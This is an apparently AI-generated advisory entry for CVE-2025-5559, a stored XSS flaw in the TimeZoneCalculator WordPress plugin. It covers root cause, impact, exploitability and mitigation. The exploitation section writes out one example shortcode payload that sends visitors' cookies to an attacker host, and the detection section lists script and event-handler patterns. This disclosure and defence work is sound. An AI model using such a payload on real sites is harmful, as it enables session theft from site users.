
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-5559 is a Stored Cross-Site Scripting (XSS) vulnerability in the TimeZoneCalculator plugin for WordPress, affecting all versions up to and including 3.37. The flaw exists in the timezonecalculator_output shortcode due to insufficient input sanitization and output escaping on user-supplied attributes. It was published on June 26, 2025, and carries a CVSS v3.1 base score of 5.4 (Medium) (Red Hat CVE, Wordfence).
The root cause is CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting), specifically a stored XSS variant. Authenticated attackers with contributor-level access or higher can embed malicious JavaScript payloads within the timezonecalculator_output shortcode attributes in WordPress posts or pages. Because the plugin fails to properly sanitize input or escape output before rendering, the injected script is stored server-side and executes in the browsers of any user who subsequently visits the affected page (Red Hat CVE, Wordfence).
Successful exploitation allows an attacker to execute arbitrary JavaScript in the context of other users' browsers, including administrators, enabling session cookie theft, credential harvesting, defacement, or redirection to malicious sites. The confidentiality and integrity impacts are rated low, with no direct availability impact. Because the payload persists on the server and executes for every visitor of the injected page, the blast radius can extend to all site users, including privileged accounts (Red Hat CVE).
No public proof-of-concept exploit code or active in-the-wild exploitation has been reported as of the available data. The EPSS score is 0.00029, indicating a very low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires at minimum contributor-level authentication on the target WordPress site, which limits opportunistic mass exploitation (Wordfence).
timezonecalculator_output shortcode with a malicious attribute, e.g., [timezonecalculator_output attribute=""><script>document.location='https://attacker.com/steal?c='+document.cookie</script>"].wp-admin/post.php or the REST API from contributor-level accounts containing timezonecalculator_output shortcode with unusual attribute values including <script>, javascript:, or encoded variants.wp_posts table entries containing timezonecalculator_output shortcode with embedded script tags or event handler attributes (e.g., onerror=, onload=).WordPress site administrators should update the TimeZoneCalculator plugin to a version beyond 3.37 that includes a fix for this vulnerability, once a patched release is made available by the plugin author (bernhard-riedl). In the interim, sites should restrict contributor-level user registration and content publishing permissions, or temporarily disable the TimeZoneCalculator plugin. Web application firewalls (WAFs) with XSS filtering rules, such as those provided by Wordfence, can provide an additional layer of protection (Wordfence).
Wordfence included CVE-2025-5559 in its weekly WordPress vulnerability report for the period of June 23–29, 2025, as part of routine disclosure coverage. Red Hat also tracked the CVE in its security advisory database. No significant independent researcher commentary or broader media coverage has been identified for this vulnerability (Wordfence, Red Hat CVE).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."